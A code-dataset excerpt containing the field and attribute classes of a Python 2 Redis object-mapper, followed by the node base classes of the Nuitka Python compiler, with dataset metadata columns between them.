The attribute accepts strings and are stored in Redis as
they are - strings.
Options
name -- alternate name of the attribute. This will be used
as the key to use when interacting with Redis.
indexed -- Index this attribute. Unindexed attributes cannot
be used in queries. Default: True.
unique -- validates the uniqueness of the value of the
attribute.
validator -- a callable that can validate the value of the
attribute.
default -- Initial value of the attribute.
"""
def __init__(self,
name=None,
indexed=True,
required=False,
validator=None,
unique=False,
default=None):
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default
self.unique = unique
self.zindexable = False
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if callable(self.default):
default = self.default()
else:
default = self.default
self.__set__(instance, default)
return default
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def typecast_for_read(self, value):
"""Typecasts the value for reading from Redis."""
# The redis client encodes all unicode data to utf-8 by default.
return value.decode('utf-8')
def typecast_for_storage(self, value):
"""Typecasts the value for storing to Redis."""
try:
return unicode(value)
except UnicodeError:
return value.decode('utf-8')
def value_type(self):
return unicode
def acceptable_types(self):
return basestring
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
# type_validation
if val is not None and not isinstance(val, self.acceptable_types()):
errors.append((self.name, 'bad type',))
# validate first standard stuff
if self.required:
if val is None or not unicode(val).strip():
errors.append((self.name, 'required'))
# validate uniquness
if val and self.unique:
error = self.validate_uniqueness(instance, val)
if error:
errors.append(error)
# validate using validator
if self.validator:
r = self.validator(self.name, val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
def validate_uniqueness(self, instance, val):
encoded = self.typecast_for_storage(val)
matches = instance.__class__.objects.filter(**{self.name: encoded})
if len(matches) > 0:
try:
instance_id = instance.id
no_id = False
except MissingID:
no_id = True
if (len(matches) != 1) or no_id or (
matches.first().id != instance.id):
return (self.name, 'not unique',)
class CharField(Attribute):
def __init__(self, max_length=255, **kwargs):
super(CharField, self).__init__(**kwargs)
self.max_length = max_length
def validate(self, instance):
errors = []
super(CharField, self).validate(instance)
val = getattr(instance, self.name)
if val and len(val) > self.max_length:
errors.append((self.name, 'exceeds max length'))
if errors:
raise FieldValidationError(errors)
class BooleanField(Attribute):
def typecast_for_read(self, value):
return bool(int(value))
def typecast_for_storage(self, value):
if value is None:
return "0"
return "1" if value else "0"
def value_type(self):
return bool
def acceptable_types(self):
return self.value_type()
class IntegerField(Attribute):
def __init__(self, **kwargs):
super(IntegerField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return int(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return unicode(value)
def value_type(self):
return int
def acceptable_types(self):
return (int, long)
class FloatField(Attribute):
def __init__(self, **kwargs):
super(FloatField, self).__init__(**kwargs)
self.zindexable = True
def typecast_for_read(self, value):
return float(value)
def typecast_for_storage(self, value):
if value is None:
return "0"
return "%f" % value
def value_type(self):
return float
def acceptable_types(self):
return self.value_type()
class DateTimeField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateTimeField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
# We load as if the timestampe was naive
dt = datetime.fromtimestamp(float(value), tzutc())
# And gently override (ie: not convert) to the TZ to UTC
return dt
except TypeError, ValueError:
return None
def typecast_for_storage(self, value):
if not isinstance(value, datetime):
raise TypeError("%s should be datetime object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
# Are we timezone aware ? If no, make it TimeZone Local
if value.tzinfo is None:
value = value.replace(tzinfo=tzlocal())
return "%d.%06d" % (float(timegm(value.utctimetuple())),
value.microsecond)
def value_type(self):
return datetime
def acceptable_types(self):
return self.value_type()
class DateField(Attribute):
def __init__(self, auto_now=False, auto_now_add=False, **kwargs):
super(DateField, self).__init__(**kwargs)
self.auto_now = auto_now
self.auto_now_add = auto_now_add
self.zindexable = True
def typecast_for_read(self, value):
try:
dt = date.fromordinal(int(value))
return dt
except TypeError, ValueError:
return None
def typecast_for_storage(self, value):
if not isinstance(value, date):
raise TypeError("%s should be date object, and not a %s" %
(self.name, type(value)))
if value is None:
return None
return "%d" % value.toordinal()
def value_type(self):
return date
def acceptable_types(self):
return self.value_type()
class ListField(object):
"""Stores a list of objects.
target_type -- can be a Python object or a redisco model class.
If target_type is not a redisco model class, the target_type should
also a callable that casts the (string) value of a list element into
target_type. E.g. str, unicode, int, float.
ListField also accepts a string that refers to a redisco model.
"""
def __init__(self, target_type,
name=None,
indexed=True,
required=False,
validator=None,
default=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self.validator = validator
self.default = default or []
from base import Model
self._redisco_model = (isinstance(target_type, basestring) or
issubclass(target_type, Model))
def __get__(self, instance, owner):
try:
return getattr(instance, '_' + self.name)
except AttributeError:
if instance.is_new():
val = self.default
else:
key = instance.key(att=self.name)
val = List(key).members
if val is not None:
klass = self.value_type()
if self._redisco_model:
val = filter(lambda o: o is not None,
[klass.objects.get_by_id(v) for v in val])
else:
val = [klass(v) for v in val]
self.__set__(instance, val)
return val
def __set__(self, instance, value):
setattr(instance, '_' + self.name, value)
def value_type(self):
if isinstance(self._target_type, basestring):
t = self._target_type
from base import get_model_from_key
self._target_type = get_model_from_key(self._target_type)
if self._target_type is None:
raise ValueError("Unknown Redisco class %s" % t)
return self._target_type
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, list):
errors.append((self.name, 'bad type'))
else:
for item in val:
if not isinstance(item, self.value_type()):
errors.append((self.name, 'bad type in list'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Collection(object):
"""
A simple container that will be replaced by the good imports
and the good filter query.
"""
def __init__(self, target_type):
self.target_type = target_type
def __get__(self, instance, owner):
if not isinstance(self.target_type, str):
raise TypeError("A collection only accepts a string "
"representing the Class")
# __import__ should be something like
# __import__('mymod.mysubmod', fromlist=['MyClass'])
klass_path = self.target_type.split(".")
fromlist = klass_path[-1]
frompath = ".".join(klass_path[0:-1])
# if the path is not empty, then it worth importing the class,
# otherwise, its a local Class and it's already been imported.
if frompath:
mod = __import__(frompath, fromlist=[fromlist])
else:
mod = sys.modules[__name__]
klass = getattr(mod, fromlist)
return klass.objects.filter(
**{instance.__class__.__name__.lower() + '_id': instance.id})
def __set__(self, instance, value):
"""
Prevent the argument to be overriden
"""
raise AttributeError("can't override a collection of object")
class ReferenceField(object):
def __init__(self,
target_type,
name=None,
attname=None,
indexed=True,
required=False,
related_name=None,
default=None,
validator=None):
self._target_type = target_type
self.name = name
self.indexed = indexed
self.required = required
self._attname = attname
self._related_name = related_name
self.validator = validator
self.default = default
def __set__(self, instance, value):
"""
Will set the referenced object unless None is provided
which will simply remove the reference
"""
if not isinstance(value, self.value_type()) and \
value is not None:
raise TypeError
# remove the cached value from the instance
if hasattr(instance, '_' + self.name):
delattr(instance, '_' + self.name)
# Remove the attribute_id reference
setattr(instance, self.attname, None)
# Set it to the new value if any.
if value is not None:
setattr(instance, self.attname, value.id)
def __get__(self, instance, owner):
try:
if not hasattr(instance, '_' + self.name):
o = self.value_type().objects.get_by_id(
getattr(instance, self.attname))
setattr(instance, '_' + self.name, o)
return getattr(instance, '_' + self.name)
except AttributeError:
setattr(instance, '_' + self.name, self.default)
return self.default
def value_type(self):
return self._target_type
@property
def attname(self):
if self._attname is None:
self._attname = self.name + '_id'
return self._attname
@property
def related_name(self):
return self._related_name
def validate(self, instance):
val = getattr(instance, self.name)
errors = []
if val:
if not isinstance(val, self.value_type()):
errors.append((self.name, 'bad type for reference'))
# validate first standard stuff
if self.required:
if not val:
errors.append((self.name, 'required'))
# validate using validator
if self.validator:
r = self.validator(val)
if r:
errors.extend(r)
if errors:
raise FieldValidationError(errors)
class Counter(IntegerField):
def __init__(self, **kwargs):
super(Counter, self).__init__(**kwargs)
if not 'default' in kwargs or self.default is None:
self.default = 0
self.zindexable = True
def __set__(self, instance, value):
raise AttributeError("can't set a counter.")
def __get__(self, instance, owner):
if not instance.is_new():
v = instance.db.hget(instance.key(), self.name)
if v is None:
return 0
return int(v)
else:
return 0
|
mit
| -8,004,247,094,733,032,000
| 30.48954
| 76
| 0.554411
| false
| 4.450621
| false
| false
| false
|
kayhayen/Nuitka
|
nuitka/nodes/NodeBases.py
|
1
|
35111
|
# Copyright 2021, Kay Hayen, mailto:kay.hayen@gmail.com
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Node base classes.
These classes provide the generic base classes available for nodes,
statements or expressions alike. There is a dedicated module for
expression only stuff.
"""
# from abc import abstractmethod
from abc import abstractmethod
from nuitka import Options, Tracing, TreeXML, Variables
from nuitka.__past__ import iterItems
from nuitka.Errors import NuitkaNodeDesignError, NuitkaNodeError
from nuitka.PythonVersions import python_version
from nuitka.SourceCodeReferences import SourceCodeReference
from nuitka.utils.InstanceCounters import (
counted_del,
counted_init,
isCountingInstances,
)
from .FutureSpecs import fromFlags
from .NodeMakingHelpers import makeStatementOnlyNodesFromExpressions
from .NodeMetaClasses import NodeCheckMetaClass, NodeMetaClassBase
class NodeBase(NodeMetaClassBase):
__slots__ = "parent", "source_ref"
# Avoid the attribute unless it's really necessary.
if Options.is_fullcompat:
__slots__ += ("effective_source_ref",)
# String to identify the node class, to be consistent with its name.
kind = None
@counted_init
def __init__(self, source_ref):
# The base class has no __init__ worth calling.
# Check source reference to meet basic standards, so we note errors
# when they occur.
assert source_ref is not None
assert source_ref.line is not None
self.parent = None
self.source_ref = source_ref
if isCountingInstances():
__del__ = counted_del()
@abstractmethod
def finalize(self):
pass
def __repr__(self):
return "<Node %s>" % (self.getDescription())
def getDescription(self):
"""Description of the node, intended for use in __repr__ and
graphical display.
"""
details = self.getDetailsForDisplay()
if details:
return "'%s' with %s" % (self.kind, details)
else:
return "'%s'" % self.kind
def getDetails(self):
"""Details of the node, intended for re-creation.
We are not using the pickle mechanisms, but this is basically
part of what the constructor call needs. Real children will
also be added.
"""
# Virtual method, pylint: disable=no-self-use
return {}
def getDetailsForDisplay(self):
"""Details of the node, intended for use in __repr__ and dumps.
This is also used for XML.
"""
return self.getDetails()
def getCloneArgs(self):
return self.getDetails()
def makeClone(self):
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **self.getCloneArgs())
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def makeCloneShallow(self):
args = self.getDetails()
args.update(self.getVisitableNodesNamed())
try:
# Using star dictionary arguments here for generic use.
result = self.__class__(source_ref=self.source_ref, **args)
except TypeError as e:
raise NuitkaNodeError("Problem cloning node", self, e)
effective_source_ref = self.getCompatibleSourceReference()
if effective_source_ref is not self.source_ref:
result.setCompatibleSourceReference(effective_source_ref)
return result
def getParent(self):
"""Parent of the node. Every node except modules have to have a parent."""
if self.parent is None and not self.isCompiledPythonModule():
# print self.getVisitableNodesNamed()
assert False, (self, self.source_ref)
return self.parent
def getChildName(self):
"""Return the role in the current parent, subject to changes."""
parent = self.getParent()
for key, value in parent.getVisitableNodesNamed():
if self is value:
return key
if type(value) is tuple:
if self in value:
return key, value.index(self)
return None
def getChildNameNice(self):
child_name = self.getChildName()
if hasattr(self.parent, "nice_children"):
return self.parent.nice_children[
self.parent.named_children.index(child_name)
]
elif hasattr(self.parent, "nice_child"):
return self.parent.nice_child
else:
return child_name
def getParentFunction(self):
"""Return the parent that is a function."""
parent = self.getParent()
while parent is not None and not parent.isExpressionFunctionBodyBase():
parent = parent.getParent()
return parent
def getParentModule(self):
"""Return the parent that is module."""
parent = self
while not parent.isCompiledPythonModule():
if hasattr(parent, "provider"):
# After we checked, we can use it, will be much faster route
# to take.
parent = parent.provider
else:
parent = parent.getParent()
return parent
def isParentVariableProvider(self):
# Check if it's a closure giver, in which cases it can provide variables,
return isinstance(self, ClosureGiverNodeMixin)
def getParentVariableProvider(self):
parent = self.getParent()
while not parent.isParentVariableProvider():
parent = parent.getParent()
return parent
def getParentReturnConsumer(self):
parent = self.getParent()
while (
not parent.isParentVariableProvider()
and not parent.isExpressionOutlineBody()
):
parent = parent.getParent()
return parent
def getParentStatementsFrame(self):
current = self.getParent()
while True:
if current.isStatementsFrame():
return current
if current.isParentVariableProvider():
return None
if current.isExpressionOutlineBody():
return None
current = current.getParent()
def getSourceReference(self):
return self.source_ref
def setCompatibleSourceReference(self, source_ref):
"""Bug compatible line numbers information.
As CPython outputs the last bit of bytecode executed, and not the
line of the operation. For example calls, output the line of the
last argument, as opposed to the line of the operation start.
For tests, we wants to be compatible. In improved more, we are
not being fully compatible, and just drop it altogether.
"""
# Getting the same source reference can be dealt with quickly, so do
# this first.
if (
self.source_ref is not source_ref
and Options.is_fullcompat
and self.source_ref != source_ref
):
# An attribute outside of "__init__", so we save one memory for the
# most cases. Very few cases involve splitting across lines.
# false alarm for non-slot:
# pylint: disable=I0021,assigning-non-slot,attribute-defined-outside-init
self.effective_source_ref = source_ref
def getCompatibleSourceReference(self):
"""Bug compatible line numbers information.
See above.
"""
return getattr(self, "effective_source_ref", self.source_ref)
def asXml(self):
line = self.source_ref.getLineNumber()
result = TreeXML.Element("node", kind=self.__class__.__name__, line="%s" % line)
compat_line = self.getCompatibleSourceReference().getLineNumber()
if compat_line != line:
result.attrib["compat_line"] = str(compat_line)
for key, value in iterItems(self.getDetailsForDisplay()):
result.set(key, str(value))
for name, children in self.getVisitableNodesNamed():
role = TreeXML.Element("role", name=name)
result.append(role)
if children is None:
role.attrib["type"] = "none"
elif type(children) not in (list, tuple):
role.append(children.asXml())
else:
role.attrib["type"] = "list"
for child in children:
role.append(child.asXml())
return result
@classmethod
def fromXML(cls, provider, source_ref, **args):
# Only some things need a provider, pylint: disable=unused-argument
return cls(source_ref=source_ref, **args)
def asXmlText(self):
xml = self.asXml()
return TreeXML.toString(xml)
def dump(self, level=0):
Tracing.printIndented(level, self)
Tracing.printSeparator(level)
for visitable in self.getVisitableNodes():
visitable.dump(level + 1)
Tracing.printSeparator(level)
@staticmethod
def isStatementsFrame():
return False
@staticmethod
def isCompiledPythonModule():
# For overload by module nodes
return False
def isExpression(self):
return self.kind.startswith("EXPRESSION_")
def isStatement(self):
return self.kind.startswith("STATEMENT_")
def isExpressionBuiltin(self):
return self.kind.startswith("EXPRESSION_BUILTIN_")
@staticmethod
def isExpressionConstantRef():
return False
@staticmethod
def isExpressionOperationUnary():
return False
@staticmethod
def isExpressionOperationBinary():
return False
@staticmethod
def isExpressionOperationInplace():
return False
@staticmethod
def isExpressionComparison():
return False
@staticmethod
def isExpressionSideEffects():
return False
@staticmethod
def isExpressionMakeSequence():
return False
@staticmethod
def isNumberConstant():
return False
@staticmethod
def isExpressionCall():
return False
@staticmethod
def isExpressionFunctionBodyBase():
return False
@staticmethod
def isExpressionOutlineFunctionBase():
return False
def visit(self, context, visitor):
visitor(self)
for visitable in self.getVisitableNodes():
visitable.visit(context, visitor)
@staticmethod
def getVisitableNodes():
return ()
@staticmethod
def getVisitableNodesNamed():
"""Named children dictionary.
For use in debugging and XML output.
"""
return ()
@staticmethod
def getName():
"""Name of the node if any."""
return None
@staticmethod
def mayHaveSideEffects():
"""Unless we are told otherwise, everything may have a side effect."""
return True
def isOrderRelevant(self):
return self.mayHaveSideEffects()
def extractSideEffects(self):
"""Unless defined otherwise, the expression is the side effect."""
return (self,)
@staticmethod
def mayRaiseException(exception_type):
"""Unless we are told otherwise, everything may raise everything."""
# Virtual method, pylint: disable=unused-argument
return True
@staticmethod
def mayReturn():
"""May this node do a return exit, to be overloaded for things that might."""
return False
@staticmethod
def mayBreak():
return False
@staticmethod
def mayContinue():
return False
def needsFrame(self):
"""Unless we are tolder otherwise, this depends on exception raise."""
return self.mayRaiseException(BaseException)
@staticmethod
def willRaiseException(exception_type):
"""Unless we are told otherwise, nothing may raise anything."""
# Virtual method, pylint: disable=unused-argument
return False
@staticmethod
def isStatementAborting():
"""Is the node aborting, control flow doesn't continue after this node."""
return False
class CodeNodeMixin(object):
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
assert name is not None
self.name = name
self.code_prefix = code_prefix
# The code name is determined on demand only.
self.code_name = None
# The "UID" values of children kinds are kept here.
self.uids = {}
def getName(self):
return self.name
def getCodeName(self):
if self.code_name is None:
provider = self.getParentVariableProvider().getEntryPoint()
parent_name = provider.getCodeName()
uid = "_%d" % provider.getChildUID(self)
assert isinstance(self, CodeNodeMixin)
if self.name:
name = uid + "_" + self.name.strip("<>")
else:
name = uid
if str is not bytes:
name = name.encode("ascii", "c_identifier").decode()
self.code_name = "%s$$$%s_%s" % (parent_name, self.code_prefix, name)
return self.code_name
def getChildUID(self, node):
if node.kind not in self.uids:
self.uids[node.kind] = 0
self.uids[node.kind] += 1
return self.uids[node.kind]
class ChildrenHavingMixin(object):
# Mixins are not allow to specify slots.
__slots__ = ()
named_children = ()
checkers = {}
def __init__(self, values):
assert (
type(self.named_children) is tuple and self.named_children
), self.named_children
# TODO: Make this true.
# assert len(self.named_children) > 1, self.kind
# Check for completeness of given values, everything should be there
# but of course, might be put to None.
if set(values.keys()) != set(self.named_children):
raise NuitkaNodeDesignError(
"Must pass named children in value dictionary",
set(values.keys()),
set(self.named_children),
)
for name, value in values.items():
if name in self.checkers:
value = self.checkers[name](value)
if type(value) is tuple:
assert None not in value, name
for val in value:
val.parent = self
elif value is None:
pass
else:
value.parent = self
attr_name = "subnode_" + name
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload, provider self.checkers instead.
"""
# Only accept legal child names
assert name in self.named_children, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if name in self.checkers:
value = self.checkers[name](value)
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def clearChild(self, name):
# Only accept legal child names
assert name in self.named_children, name
if name in self.checkers:
self.checkers[name](None)
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not None
setattr(self, attr_name, None)
def getChild(self, name):
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
result = []
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
if value is None:
pass
elif type(value) is tuple:
result += list(value)
elif isinstance(value, NodeBase):
result.append(value)
else:
raise AssertionError(
self, "has illegal child", name, value, value.__class__
)
return tuple(result)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
for name in self.named_children:
attr_name = "subnode_" + name
value = getattr(self, attr_name)
yield name, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node, as an added difficulty, what might be
# happening, is that the old node is an element of a tuple, in which we
# may also remove that element, by setting it to None.
for key in self.named_children:
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node)
for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
values = {}
for key in self.named_children:
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
for c in self.getVisitableNodes():
c.finalize()
class ClosureGiverNodeMixin(CodeNodeMixin):
"""Base class for nodes that provide variables for closure takers."""
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, name, code_prefix):
CodeNodeMixin.__init__(self, name=name, code_prefix=code_prefix)
self.temp_variables = {}
self.temp_scopes = {}
self.preserver_id = 0
def hasProvidedVariable(self, variable_name):
return self.locals_scope.hasProvidedVariable(variable_name)
def getProvidedVariable(self, variable_name):
if not self.locals_scope.hasProvidedVariable(variable_name):
variable = self.createProvidedVariable(variable_name=variable_name)
self.locals_scope.registerProvidedVariable(variable)
return self.locals_scope.getProvidedVariable(variable_name)
@abstractmethod
def createProvidedVariable(self, variable_name):
"""Create a variable provided by this function."""
def allocateTempScope(self, name):
self.temp_scopes[name] = self.temp_scopes.get(name, 0) + 1
return "%s_%d" % (name, self.temp_scopes[name])
def allocateTempVariable(self, temp_scope, name, temp_type=None):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
assert name != "result"
full_name = name
# No duplicates please.
assert full_name not in self.temp_variables, full_name
result = self.createTempVariable(temp_name=full_name, temp_type=temp_type)
# Late added temp variables should be treated with care for the
# remaining trace.
if self.trace_collection is not None:
self.trace_collection.initVariableUnknown(result).addUsage()
return result
def createTempVariable(self, temp_name, temp_type):
if temp_name in self.temp_variables:
return self.temp_variables[temp_name]
if temp_type is None:
temp_class = Variables.TempVariable
elif temp_type == "bool":
temp_class = Variables.TempVariableBool
else:
assert False, temp_type
result = temp_class(owner=self, variable_name=temp_name)
self.temp_variables[temp_name] = result
return result
def getTempVariable(self, temp_scope, name):
if temp_scope is not None:
full_name = "%s__%s" % (temp_scope, name)
else:
full_name = name
return self.temp_variables[full_name]
def getTempVariables(self):
return self.temp_variables.values()
def _removeTempVariable(self, variable):
del self.temp_variables[variable.getName()]
def optimizeUnusedTempVariables(self):
remove = []
for temp_variable in self.getTempVariables():
empty = self.trace_collection.hasEmptyTraces(variable=temp_variable)
if empty:
remove.append(temp_variable)
for temp_variable in remove:
self._removeTempVariable(temp_variable)
def allocatePreserverId(self):
if python_version >= 0x300:
self.preserver_id += 1
return self.preserver_id
class ClosureTakerMixin(object):
"""Mixin for nodes that accept variables from closure givers."""
# Mixins are not allow to specify slots, pylint: disable=assigning-non-slot
__slots__ = ()
def __init__(self, provider):
self.provider = provider
self.taken = set()
def getParentVariableProvider(self):
return self.provider
def getClosureVariable(self, variable_name):
result = self.provider.getVariableForClosure(variable_name=variable_name)
assert result is not None, variable_name
if not result.isModuleVariable():
self.addClosureVariable(result)
return result
def addClosureVariable(self, variable):
self.taken.add(variable)
return variable
def getClosureVariables(self):
return tuple(
sorted(
[take for take in self.taken if not take.isModuleVariable()],
key=lambda x: x.getName(),
)
)
def getClosureVariableIndex(self, variable):
closure_variables = self.getClosureVariables()
for count, closure_variable in enumerate(closure_variables):
if variable is closure_variable:
return count
raise IndexError(variable)
def hasTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return True
return False
def getTakenVariable(self, variable_name):
for variable in self.taken:
if variable.getName() == variable_name:
return variable
return None
class StatementBase(NodeBase):
"""Base class for all statements."""
# Base classes can be abstract, pylint: disable=abstract-method
# TODO: Have them all.
# @abstractmethod
@staticmethod
def getStatementNiceName():
return "undescribed statement"
def computeStatementSubExpressions(self, trace_collection):
"""Compute a statement.
Default behavior is to just visit the child expressions first, and
then the node "computeStatement". For a few cases this needs to
be overloaded.
"""
expressions = self.getVisitableNodes()
for count, expression in enumerate(expressions):
assert expression.isExpression(), (self, expression)
expression = trace_collection.onExpression(expression=expression)
if expression.willRaiseException(BaseException):
wrapped_expression = makeStatementOnlyNodesFromExpressions(
expressions[: count + 1]
)
assert wrapped_expression is not None
return (
wrapped_expression,
"new_raise",
lambda: "For %s the child expression '%s' will raise."
% (self.getStatementNiceName(), expression.getChildNameNice()),
)
return self, None, None
class StatementChildrenHavingBase(ChildrenHavingMixin, StatementBase):
def __init__(self, values, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
ChildrenHavingMixin.__init__(self, values=values)
class StatementChildHavingBase(StatementBase):
named_child = ""
checker = None
def __init__(self, value, source_ref):
StatementBase.__init__(self, source_ref=source_ref)
assert type(self.named_child) is str and self.named_child
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
assert type(value) is not list, self.named_child
if type(value) is tuple:
assert None not in value, self.named_child
for val in value:
val.parent = self
elif value is not None:
value.parent = self
elif value is None:
pass
else:
assert False, type(value)
attr_name = "subnode_" + self.named_child
setattr(self, attr_name, value)
def setChild(self, name, value):
"""Set a child value.
Do not overload, provider self.checkers instead.
"""
# Only accept legal child names
assert name == self.named_child, name
# Lists as inputs are OK, but turn them into tuples.
if type(value) is list:
value = tuple(value)
if self.checker is not None:
value = self.checker(value) # False alarm, pylint: disable=not-callable
# Re-parent value to us.
if type(value) is tuple:
for val in value:
val.parent = self
elif value is not None:
value.parent = self
attr_name = "subnode_" + name
# Determine old value, and inform it about losing its parent.
old_value = getattr(self, attr_name)
assert old_value is not value, value
setattr(self, attr_name, value)
def getChild(self, name):
# Only accept legal child names
attr_name = "subnode_" + name
return getattr(self, attr_name)
def getVisitableNodes(self):
# TODO: Consider if a generator would be faster.
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
if value is None:
return ()
elif type(value) is tuple:
return value
elif isinstance(value, NodeBase):
return (value,)
else:
raise AssertionError(self, "has illegal child", value, value.__class__)
def getVisitableNodesNamed(self):
"""Named children dictionary.
For use in debugging and XML output.
"""
attr_name = "subnode_" + self.named_child
value = getattr(self, attr_name)
yield self.named_child, value
def replaceChild(self, old_node, new_node):
if new_node is not None and not isinstance(new_node, NodeBase):
raise AssertionError(
"Cannot replace with", new_node, "old", old_node, "in", self
)
# Find the replaced node, as an added difficulty, what might be
# happening, is that the old node is an element of a tuple, in which we
# may also remove that element, by setting it to None.
key = self.named_child
value = self.getChild(key)
if value is None:
pass
elif type(value) is tuple:
if old_node in value:
if new_node is not None:
self.setChild(
key,
tuple(
(val if val is not old_node else new_node) for val in value
),
)
else:
self.setChild(
key, tuple(val for val in value if val is not old_node)
)
return key
elif isinstance(value, NodeBase):
if old_node is value:
self.setChild(key, new_node)
return key
else:
assert False, (key, value, value.__class__)
raise AssertionError("Didn't find child", old_node, "in", self)
def getCloneArgs(self):
# Make clones of child nodes too.
values = {}
key = self.named_child
value = self.getChild(key)
assert type(value) is not list, key
if value is None:
values[key] = None
elif type(value) is tuple:
values[key] = tuple(v.makeClone() for v in value)
else:
values[key] = value.makeClone()
values.update(self.getDetails())
return values
def finalize(self):
del self.parent
attr_name = "subnode_" + self.named_child
child = getattr(self, attr_name)
if child is not None:
child.finalize()
delattr(self, attr_name)
class SideEffectsFromChildrenMixin(object):
# Mixins are not allow to specify slots.
__slots__ = ()
def mayHaveSideEffects(self):
for child in self.getVisitableNodes():
if child.mayHaveSideEffects():
return True
return False
def extractSideEffects(self):
# No side effects at all but from the children.
result = []
for child in self.getVisitableNodes():
result.extend(child.extractSideEffects())
return tuple(result)
def computeExpressionDrop(self, statement, trace_collection):
# Expression only statement plays no role, pylint: disable=unused-argument
side_effects = self.extractSideEffects()
# TODO: Have a method for nicer output and remove existing overloads
# by using classes and prefer generic implementation here.
if side_effects:
return (
makeStatementOnlyNodesFromExpressions(side_effects),
"new_statements",
"Lowered unused expression %s to its side effects." % self.kind,
)
else:
return (
None,
"new_statements",
"Removed %s without side effects." % self.kind,
)
def makeChild(provider, child, source_ref):
child_type = child.attrib.get("type")
if child_type == "list":
return [
fromXML(provider=provider, xml=sub_child, source_ref=source_ref)
for sub_child in child
]
elif child_type == "none":
return None
else:
return fromXML(provider=provider, xml=child[0], source_ref=source_ref)
def getNodeClassFromKind(kind):
return NodeCheckMetaClass.kinds[kind]
def extractKindAndArgsFromXML(xml, source_ref):
kind = xml.attrib["kind"]
args = dict(xml.attrib)
del args["kind"]
if source_ref is None:
source_ref = SourceCodeReference.fromFilenameAndLine(
args["filename"], int(args["line"])
)
del args["filename"]
del args["line"]
else:
source_ref = source_ref.atLineNumber(int(args["line"]))
del args["line"]
node_class = getNodeClassFromKind(kind)
return kind, node_class, args, source_ref
def fromXML(provider, xml, source_ref=None):
assert xml.tag == "node", xml
kind, node_class, args, source_ref = extractKindAndArgsFromXML(xml, source_ref)
if "constant" in args:
# TODO: Try and reduce/avoid this, use marshal and/or pickle from a file
# global stream instead. For now, this will do. pylint: disable=eval-used
args["constant"] = eval(args["constant"])
if kind in (
"ExpressionFunctionBody",
"PythonMainModule",
"PythonCompiledModule",
"PythonCompiledPackage",
"PythonInternalModule",
):
delayed = node_class.named_children
if "code_flags" in args:
args["future_spec"] = fromFlags(args["code_flags"])
else:
delayed = ()
for child in xml:
assert child.tag == "role", child.tag
child_name = child.attrib["name"]
# Might want to want until provider is updated with some
# children. In these cases, we pass the XML node, rather
# than a Nuitka node.
if child_name not in delayed:
args[child_name] = makeChild(provider, child, source_ref)
else:
args[child_name] = child
try:
return node_class.fromXML(provider=provider, source_ref=source_ref, **args)
except (TypeError, AttributeError):
Tracing.printLine(node_class, args, source_ref)
raise
|
apache-2.0
| 8,789,145,488,713,669,000
| 28.308013
| 88
| 0.594856
| false
| 4.418701
| false
| false
| false
|
